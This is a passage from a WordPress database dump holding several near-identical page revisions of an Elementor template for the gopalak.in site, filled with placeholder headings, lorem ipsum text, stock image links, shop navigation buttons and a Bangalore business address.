.elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo</p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"612\" height=\"408\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg 612w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-300x200.jpg 300w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-50x33.jpg 50w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-48x32.jpg 48w\" sizes=\"(max-width: 612px) 100vw, 612px\" />															\n			<link rel=\"stylesheet\" href=\"https://gopalak.in/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										List Item #1\n									</li>\n								<li>\n										List Item #2\n									</li>\n								<li>\n										List Item #3\n									</li>\n								<li>\n										List Item\n									</li>\n						</ul>\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p><strong>Lorem Ipsum</strong> is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Know More\n					</a>\n			<h2>LATEST NEWS</h2>		\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\nContact : (+91)7259272171<br>\nE-mail id: mango@homedirect.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-09-30 11:43:26','2022-09-30 06:13:26','',1373,'https://gopalak.in/?p=1473',0,'revision','',0),(1474,1,'2022-09-30 11:44:03','2022-09-30 06:14:03','<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo</p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"612\" height=\"408\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg 612w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-300x200.jpg 300w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-50x33.jpg 50w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-48x32.jpg 48w\" sizes=\"(max-width: 612px) 100vw, 612px\" />															\n			<link rel=\"stylesheet\" href=\"https://gopalak.in/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										List Item #1\n									</li>\n								<li>\n										List Item #2\n									</li>\n								<li>\n										List Item #3\n									</li>\n								<li>\n										List Item\n									</li>\n						</ul>\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p><strong>Lorem Ipsum</strong> is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Know More\n					</a>\n			<h2>LATEST NEWS</h2>		\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\nContact : (+91)7259272171<br>\nE-mail id: mango@homedirect.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-09-30 11:44:03','2022-09-30 06:14:03','',1373,'https://gopalak.in/?p=1474',0,'revision','',0),(1475,1,'2022-09-30 11:44:03','2022-09-30 06:14:03','<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo</p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"612\" height=\"408\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg 612w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-300x200.jpg 300w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-50x33.jpg 50w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-48x32.jpg 48w\" sizes=\"(max-width: 612px) 100vw, 612px\" />															\n			<link rel=\"stylesheet\" href=\"https://gopalak.in/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										List Item #1\n									</li>\n								<li>\n										List Item #2\n									</li>\n								<li>\n										List Item #3\n									</li>\n								<li>\n										List Item\n									</li>\n						</ul>\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p><strong>Lorem Ipsum</strong> is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Know More\n					</a>\n			<h2>LATEST NEWS</h2>		\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\nContact : (+91)7259272171<br>\nE-mail id: mango@homedirect.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-09-30 11:44:03','2022-09-30 06:14:03','',1373,'https://gopalak.in/?p=1475',0,'revision','',0),(1476,1,'2022-09-30 11:44:03','2022-09-30 06:14:03','<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo</p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"612\" height=\"408\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg 612w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-300x200.jpg 300w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-50x33.jpg 50w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-48x32.jpg 48w\" sizes=\"(max-width: 612px) 100vw, 612px\" />															\n			<link rel=\"stylesheet\" href=\"https://gopalak.in/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										List Item #1\n									</li>\n								<li>\n										List Item #1\n									</li>\n								<li>\n										List Item #1\n									</li>\n								<li>\n										List Item #2\n									</li>\n								<li>\n										List Item #3\n									</li>\n						</ul>\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p><strong>Lorem Ipsum</strong> is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Know More\n					</a>\n			<h2>LATEST NEWS</h2>		\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" 